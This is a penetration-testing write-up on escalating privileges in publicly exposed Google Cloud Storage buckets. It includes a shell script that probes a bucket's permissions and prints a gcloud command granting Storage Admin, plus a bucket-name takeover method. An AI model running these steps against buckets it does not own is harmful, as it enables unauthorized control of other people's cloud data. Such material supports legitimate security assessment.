GCP - Public Buckets Privilege Escalation
If the bucket policy grants "allUsers" or "allAuthenticatedUsers" the ability to write the bucket policy itself (the storage.buckets.setIamPolicy permission), then anyone (or anyone with a Google account, respectively) can rewrite the bucket policy and grant themselves full access.
There are 2 ways to check the permissions you hold on a bucket. The first is to read the bucket's IAM policy directly, either by requesting https://www.googleapis.com/storage/v1/b/BUCKET_NAME/iam or by running gsutil iam get gs://BUCKET_NAME.
However, if your identity (which might only be a member of allUsers or allAuthenticatedUsers) lacks permission to read the bucket's IAM policy (storage.buckets.getIamPolicy), that request fails.
The other option, which always works because it only asks the API about the caller's own permissions, is the bucket's testPermissions endpoint. It echoes back the subset of the requested permissions that you actually hold, for example: https://www.googleapis.com/storage/v1/b/BUCKET_NAME/iam/testPermissions?permissions=storage.buckets.delete&permissions=storage.buckets.get&permissions=storage.buckets.getIamPolicy&permissions=storage.buckets.setIamPolicy&permissions=storage.buckets.update&permissions=storage.objects.create&permissions=storage.objects.delete&permissions=storage.objects.get&permissions=storage.objects.list&permissions=storage.objects.update
If storage.buckets.setIamPolicy is in the response, Storage Admin can be granted to allAuthenticatedUsers (or to your own identity) by adding a binding to the bucket policy.
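The following script is an added example, not code from the original page: it builds the testPermissions URL described above, checks whether storage.buckets.setIamPolicy is among the permissions the API returns, and prints the gcloud command that would add the Storage Admin binding. The bucket name, the member (allAuthenticatedUsers by default), the use of gcloud for the access token and the sample JSON response are all assumptions; an unauthenticated request (no Authorization header) probes what allUsers is granted.

```shell
#!/bin/sh
# Added example (not from the original page). Enumerates the caller's effective
# permissions on a GCS bucket via testPermissions and, if the bucket policy is
# writable, shows the binding that escalates to Storage Admin.
# Assumptions: BUCKET_NAME is passed as $1, gcloud is installed for the token,
# and SAMPLE_RESPONSE below is a constructed response used for offline checks.
set -eu

# Build the testPermissions URL for a bucket and the permissions to probe.
build_test_url() {
  bucket=$1; shift
  url="https://www.googleapis.com/storage/v1/b/$bucket/iam/testPermissions"
  sep='?'
  for p in "$@"; do
    url="$url${sep}permissions=$p"
    sep='&'
  done
  printf '%s' "$url"
}

# Succeed if a permission name appears in a testPermissions JSON response
# (the API only echoes back the permissions the caller actually holds).
has_perm() {
  printf '%s' "$1" | grep -qF "\"$2\""
}

# Constructed sample response, shaped like the real API output, for offline use.
SAMPLE_RESPONSE='{"kind":"storage#testIamPermissionsResponse","permissions":["storage.objects.get","storage.objects.list","storage.buckets.setIamPolicy"]}'

# The binding that grants Storage Admin on the bucket to a member such as
# allAuthenticatedUsers or user:you@example.com. Printed rather than executed so
# the decision to modify the target's policy stays with the operator.
grant_admin_cmd() {
  printf 'gcloud storage buckets add-iam-policy-binding gs://%s --member=%s --role=roles/storage.admin' "$1" "$2"
}

# Live run: ./check.sh BUCKET_NAME [MEMBER]. Without a gcloud token the request
# goes out anonymously, i.e. it tests what allUsers can do.
main() {
  bucket=$1
  member=${2:-allAuthenticatedUsers}
  token=$(gcloud auth print-access-token 2>/dev/null || true)
  url=$(build_test_url "$bucket" \
    storage.buckets.get storage.buckets.getIamPolicy storage.buckets.setIamPolicy \
    storage.buckets.delete storage.objects.list storage.objects.get storage.objects.create)
  if [ -n "$token" ]; then
    resp=$(curl -s -H "Authorization: Bearer $token" "$url")
  else
    resp=$(curl -s "$url")
  fi
  echo "testPermissions response: $resp"
  if has_perm "$resp" storage.buckets.setIamPolicy; then
    echo "setIamPolicy is granted: the bucket policy can be rewritten. Escalation command:"
    grant_admin_cmd "$bucket" "$member"; echo
  else
    echo "setIamPolicy not granted; no policy takeover from this identity."
  fi
}

if [ $# -gt 0 ]; then main "$@"; fi
```

Run it once with a token and once without to compare what allAuthenticatedUsers and allUsers respectively hold; the two results often differ, and the anonymous probe is the one that matters for a truly public bucket.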
Another attack, when storage.buckets.delete is granted, is to delete the bucket and recreate it with the same name in a project you control, stealing ownership of the name (bucket names are globally unique, so anything that still references the old bucket now points at yours).